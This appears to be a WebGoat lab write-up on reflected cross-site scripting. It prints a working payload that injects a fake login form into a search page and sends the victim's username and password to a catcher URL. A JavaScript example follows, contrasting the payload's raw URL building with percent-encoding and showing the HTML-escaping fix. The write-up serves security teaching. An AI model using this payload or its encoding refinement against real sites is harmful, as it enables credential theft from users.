The search input that finally worked (the whole form is entered as the search string, so the vulnerable page reflects it as live HTML):
<form><br/><br/><HR><H3>This feature requires account login:</H3><br/><br/>Enter Username:<br/><input type="text" id="user" name="user"><br/>Enter Password:<br/><input type="password" name="pass" id="pass"><br/><input type="submit" name="login" value="login" onclick="var user=document.getElementById('user');var pass=document.getElementById('pass');alert('Had this been a real attack... Your credentials were just stolen. User Name = ' + user.value + ' Password = ' + pass.value);var XSSImage=new Image; XSSImage.src='http://localhost:8080/webgoat/catcher?PROPERTY=yes&user='+ user.value + '&password=' + pass.value + '';"><br/><br/><HR></form>
Mind the use of single versus double quotes (the onclick handler is in double quotes, so every string inside it must use single quotes), and use the catcher URL that matches your local setup (host, port and context path). The Image object never has to be inserted into the page: setting its src is enough to make the browser issue the GET request that carries the credentials. This only illustrates the principle and is obviously harmless, since the catcher runs on localhost. In a real attack, delivery through a malicious link is the more likely route.
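The two halves of the lesson, as an added example in plain JavaScript (not code from the original post or from WebGoat): how the injected onclick handler builds the exfiltration URL, why its raw string concatenation loses part of a password that contains `&` or `#`, and the output-encoding fix the vulnerable search page is missing. The catcher base URL is the one from the post; `escapeHtml` and `renderSearchResult` are hypothetical helpers standing in for the page's own rendering, and the payload string is constructed sample input.

```javascript
// Added example, not part of the original post or of WebGoat.

// 1. Exfiltration as the payload does it: raw concatenation into the query
//    string. A '&' in the password starts a new parameter and a '#' starts
//    the fragment, so the catcher only receives the prefix.
function naiveCatcherUrl(base, user, pass) {
  return base + '?PROPERTY=yes&user=' + user + '&password=' + pass;
}

// The same request with percent-encoding, which is what a careful attacker
// (or a legitimate form) would emit.
function encodedCatcherUrl(base, user, pass) {
  return base + '?PROPERTY=yes&user=' + encodeURIComponent(user) +
         '&password=' + encodeURIComponent(pass);
}

// What the catcher endpoint would parse out of the request URL
// (WHATWG URL API, built into Node and browsers).
function catcherParams(urlString) {
  const u = new URL(urlString);
  return {
    user: u.searchParams.get('user'),
    password: u.searchParams.get('password'),
  };
}

// 2. The missing defence on the vulnerable page: HTML-encode the search term
//    before reflecting it, so the injected <form> is shown as literal text
//    instead of being rendered as markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hypothetical stand-in for the search page's result rendering.
function renderSearchResult(term) {
  return '<p>Results for: ' + escapeHtml(term) + '</p>';
}

// Constructed sample payload (a trimmed version of the form in the post).
const SAMPLE_PAYLOAD =
  '<form><input type="text" id="user"><input type="submit" onclick="alert(1)"></form>';

// Stand-alone demonstration.
const BASE = 'http://localhost:8080/webgoat/catcher';
console.log(catcherParams(naiveCatcherUrl(BASE, 'alice', 'p&ss#1')));   // password: 'p'
console.log(catcherParams(encodedCatcherUrl(BASE, 'alice', 'p&ss#1'))); // password: 'p&ss#1'
console.log(renderSearchResult(SAMPLE_PAYLOAD));                        // no live <form>
```

Run it with `node`. The encoded variant shows why `encodeURIComponent` matters on the attacker's side; `renderSearchResult` shows the one-line fix on the application side, which is the lesson's real point: the search page reflects untrusted input into HTML without encoding it.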